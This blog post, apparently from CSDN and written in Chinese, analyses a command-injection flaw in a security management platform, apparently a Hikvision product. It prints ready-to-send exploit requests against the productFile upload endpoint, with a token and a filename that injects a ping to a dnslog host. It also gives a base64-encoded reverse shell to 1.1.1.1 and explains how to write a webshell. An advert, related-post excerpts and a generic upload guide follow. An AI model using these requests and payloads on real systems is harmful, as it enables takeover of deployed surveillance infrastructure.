某安防管理平台一次远程命令执行漏洞分析

原创 于 2025-03-04 10:31:25 发布 · 1k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #前端 #xss #php

通过某些渠道拿到一些漏洞情报,直接打开idea完整的跟一下给他卷出来,简单的讲述一下整个分析的过程以及漏洞触发的流程

漏洞细节

通过情报直接获取到一点点细节,那就直接开始看过程

img

img

直接可以上传webshell,但是这里有一个Token鉴权

img

我们需要看这个Token的生成算法

img

对应的是so文件,需要我们ida逆向分析

img

直接看sub_35690函数即可,

img

这里主要看v8大于等于0的函数即可,这里我就懒得看了

复现

数据包

POST /svm/api/v1/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP/1.1
Host:
Token: SElLIElnVTBzNVd6eWlibVB4M046dUE0SlBBbGJTWGNMUnk5aWg4dkJXL2RjeEdqKys4aTd0cHBMM09INytVZz0=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 566
Content-Type: multipart/form-data; boundary=------------------------LOHhVTVvcAweFijvGOVJEnTJWjEQDyVdzQtdtDcx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

--------------------------LOHhVTVvcAweFijvGOVJEnTJWjEQDyVdzQtdtDcx
Content-Disposition: form-data; name=“file”;filename=“z.zip”
{{file(/Users/zhizhuo/Desktop/tools/目录穿越zip生成器/z.zip)}}
--------------------------LOHhVTVvcAweFijvGOVJEnTJWjEQDyVdzQtdtDcx–

img

没打成功,回头在细梭一边代码,发现最终RCE的地方并不是文件上传,而是文件名字,先放一段要用的payload

"`ping xxx.dnslog.cn`.zip"  
# 反弹shell  
"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzkwOTkgMD4mMQ== | base64 -d"

文件名字不能有/这tm直接就不能写webshell,看起来只能无回显利用

img

img

img

最后构造的poc数据包

POST /svm/api/v1/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP/1.1  
Host:   
Token: SElLIElnVTBzNVd6eWlibVB4M046dUE0SlBBbGJTWGNMUnk5aWg4dkJXL2RjeEdqKys4aTd0cHBMM09INytVZz0=  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data;boundary =---------------------------142851345723692939351758052805  
Content-Length: 346  

-----------------------------142851345723692939351758052805  
Content-Disposition: form-data; name="file"; filename="`ping xxx.dnslog.cn`.zip"  
Content-Type: application/zip  

123  
-----------------------------142851345723692939351758052805--

Token生成

在@Y4tacker 的指导下完成了整个token获取后台变前台(二进制的算法被Y5割了2个月没给我)
img

对于除了/static/外的路径都会经过验证Token

img

如果传入的Token没有通过验证的话,那么就会生成一个新的Token返回,下面找到访问控制器就可以了

img

构造请求获取Token信息

img

Token到手,在配合前面的上传数据包就可以实现远程命令执行

EXP

构造请求获取Token信息

[外链图片转存中…(img-sljyw9zB-1741055464208)]

Token到手,在配合前面的上传数据包就可以实现远程命令执行

EXP

前面有说到有/拦截不能写webshell,但是实际上是可以,在上面给到的payload中有一个反弹shell的操作,利用的正是linux的特性,所以直接通过base64的方式加上重定向追加写入就是可以写入webshell的## 最后
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

扫码领取

白帽KK
关注
海康威视iSecure Center 综合安防管理平台detection接口存在远程命令执行漏洞
xiaokp7的博客
07-24 1736
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。
漏洞复现】Hikvision海康综合安防管理平台applyAutoLoginTicket接口存在远程命令执行漏洞
失心少年
06-30 680
海康威视其产品包括摄像机、多屏控制器、交通产品、传输产品、存储产品、门禁产品、消防器材等。海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商,业务聚焦于综合安防、大数据服务和智慧业务。海康威视其产品包括摄像机、多屏控制器、交通产品、传输产品、存储产品、门禁产品、消防器材等。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
海康威视运行管理中心 Fastjson RCE
Keepb1ue的博客
12-21 4058
海康威视运行管理中心系统存在低版本Fastjson远程命令执行漏洞,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本地利用链直接命令执行,从而获取服务器权限。
远程命令执行漏洞分析
若有战,召必回
12-20 1264
漏洞细节通过情报直接获取到一点点细节,那就直接开始看过程直接可以上传webshell,但是这里有一个Token鉴权我们需要看这个Token的生成算法对应的是so文件,需要我们ida逆向分析直接看sub_35690函数即可,这里主要看v8大于等于0的函数即可,这里我就懒得看了复现数据包Host:;q=0.2Win64;​。
Hashicorp Consul Service API远程命令执行漏洞
网络安全。
01-18 8581
2018年11月27日,Consul在官方博客中发布了有关Consul工具可能存在远程命令执行(RCE)漏洞的公告,并提供了防护该漏洞的配置方案。Consul是HashiCorp公司推出的一款开源工具,旨在实现分布式系统的服务发现与配置。相较于其他分布式服务注册与发现的解决方案,Consul提供更为全面的功能。它内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,无需依赖其他工具(如ZooKeeper等),使用也相对简单。
远程代码执行漏洞(RCE)分析与复现
ABUG
09-14 1241
这种漏洞通常出现在没有对输入数据进行严格过滤和验证的情况下,允许恶意用户发送特制的输入,使服务器执行未授权的命令或程序。远程代码执行漏洞的严重性不言而喻,攻击者可以通过未受控的输入执行恶意命令,直接控制服务器或获取敏感信息。我们将使用常见的Web应用程序漏洞示例,来展示一个典型的RCE漏洞的发现与利用过程。RCE的危害性非常高,攻击者可以直接接管服务器,执行恶意代码,访问敏感数据,或进行更多的破坏性操作。提交恶意输入后,如果漏洞存在,页面会返回两条命令的结果:ping 命令的结果和 ls 命令的结果。
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
fly夏天的博客
06-19 6867
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
【攻防演练】【含poc和修复建议】海康威视综合安防管理平台 远程命令执行漏洞
zzxx191z的博客
07-27 1477
使用防护类设备进行防护,限制访问/center/api/installation/detection 路径,拦截请求中出现的恶意命令注入。
Hikvision综合安防管理平台applyAutoLoginTicket接口存在远程命令执行漏洞 附POC
nnn2188185的博客
06-21 263
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视iSecure-Center 综合安防管理平台 applyAutoLoginTicket/keepAlive/applyCT 远程命令执行漏洞
WuYSec的博客
06-12 1636
海康威视iSecure Center综合安防管理平台是一套集成化、智能化的安防管理系统。海康威视iSecure Center综合安防管理平台存在远程命令执行漏洞,可造成远程命令执行
[代码审计]海康productFile命令执行历史漏洞分析(含poc)
LiangYueSec的博客
07-30 1495
[代码审计]海康productFile命令执行历史漏洞分析(含poc)
Consul ACL访问权限控制
fomeiherz的专栏
12-23 7755
提前准备 版本:V1.6.2 下载:https://www.consul.io/downloads.html 配置文件:config-acl.json { "datacenter":"tencent-datacenter", "data_dir":"/usr/local/consul-1.6.2/data", "log_file":"/usr/local/consul-1....
漏洞复现篇
热门推荐
渗透之路,攻防之间皆学问
03-03 2万+
weblogic WebLogic T3 协议反序列化远程命令执行(CVE-2020-2883) Weblogic Server远程代码执行漏洞(CVE-2021-2109 ) apache Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530) Apache Druid RCE(CVE-2021-25646) Apache Tomcat 文件包含漏洞(CVE-2020-1938) Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍
actuator防止外部访问漏洞修复
三侠剑的博客
03-07 5990
解决办法适用于2.x springboot版本 法零:和网站设置不同端口,不映射到外面,并修改路径 法一:禁用所有http接口,将配置改成:management.endpoints.web.exposure.exclude=* 法二:引入spring-boot-starter-security依赖,增加安全认证 <dependency> <groupId>org.springframework.boot</groupId> <artifactId&...
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行、代码执行
weixin_52796034的博客
10-26 4893
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行时执行攻击者指定的代码。RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞
未授权访问漏洞原理以及修复方法
it知识分享 free for nothing..
12-20 9147
未授权访问漏洞 原理以及修复方法
网络安全-RCE(远程命令执行漏洞原理、攻击与防御
关注网络安全、云原生安全
10-05 1万+
目录 简介 原理 攻击 防御 参考 简介 RCE(remote command/code execute,远程命令执行)漏洞,一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想
漏洞复现】海康威视安防管理平台/v1/keepAlive 接口处存在远程命令执行漏洞
m0_46381222的博客
10-23 1301
漏洞复现】海康威视安防管理平台/v1/keepAlive 接口处存在远程命令执行漏洞
Apache Tika-server RCE(CVE-2018-1335)
公众号shadow sock7
03-13 1336
PoC:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335 PUT /meta HTTP/1.1 Host: cqq.com:9998 Connection: close User-Agent: python-requests/2.19.1 X-Tika-OCRTesseractPath: &amp;amp;quot;cscript&amp;amp;quot; Co...
海康威视综合安防平台文件上传
最新发布
01-04
### 海康威视综合安防平台文件上传方法操作指南 #### 1. 平台概述 海康威视iVMS-8700是一款功能强大的综合安防管理平台软件,广泛应用于各种安全监控场景。该平台支持多种设备接入方式,并提供丰富的管理和维护接口[^3]。 #### 2. 文件上传的安全风险提示 值得注意的是,在使用此类系统时需特别关注安全性问题。此前曾有报告指出该版本存在文件上传漏洞,攻击者可能利用此漏洞执行恶意脚本或命令,因此建议用户及时更新至最新稳定版并遵循官方发布的补丁说明以消除潜在威胁[^1]。 #### 3. 准备工作 为了顺利完成文件上传操作,请先确认已安装好相应的客户端程序以及具备管理员权限账号登录状态正常;另外还需准备好待传输的目标文件及其存储路径规划。 #### 4. 登录与导航 启动应用程序后输入正确的用户名密码完成身份验证过程进入主界面。通过左侧菜单栏依次点击【设置】->【服务器配置】找到目标选项卡准备下一步动作。 #### 5. 配置FTP/SFTP服务参数 如果打算借助第三方协议实现远程文件交换,则需要预先设定好外部连接所需的必要信息如主机名/IP地址、端口号、账户凭证等细节项。具体步骤如下: - **选择传输模式**:根据实际需求决定采用哪种方式进行资料传递(推荐SFTP加密通道) - **填写基本属性**:参照屏幕提示准确录入各项必填字段内容确保无误提交保存更改生效 ```bash # 示例 FTP 设置 (仅作为参考) Host Name: ftp.example.com Port Number: 21 Username: admin_user Password: ********** Remote Directory Path:/uploads/ ``` #### 6. 执行文件传送任务 当上述准备工作全部就绪之后就可以着手实施具体的文件转移活动了。通常情况下可以在界面上直接拖拽本地资源到指定区域亦或是打开专门设计用于此项工作的对话框手动挑选要迁移的对象列表逐一添加进去等待进度条显示完毕即告成功结束整个流程。 对于批量作业而言还可以考虑编写自动化脚本来简化重复劳动提高工作效率减少人为失误概率。下面给出了一段Python代码片段展示如何调用paramiko库来进行基于SSH协议下的安全文件拷贝操作: ```python import paramiko ssh_client = paramiko.SSHClient() ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh_client.connect('ftp.example.com', username='admin_user', password='*********') sftp = ssh_client.open_sftp() local_file_path = '/path/to/local/file.txt' remote_file_path = '/remote/path/file.txt' sftp.put(local_file_path, remote_file_path) finally: if 'sftp' in locals(): sftp.close() ssh_client.close() print("File uploaded successfully.") ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值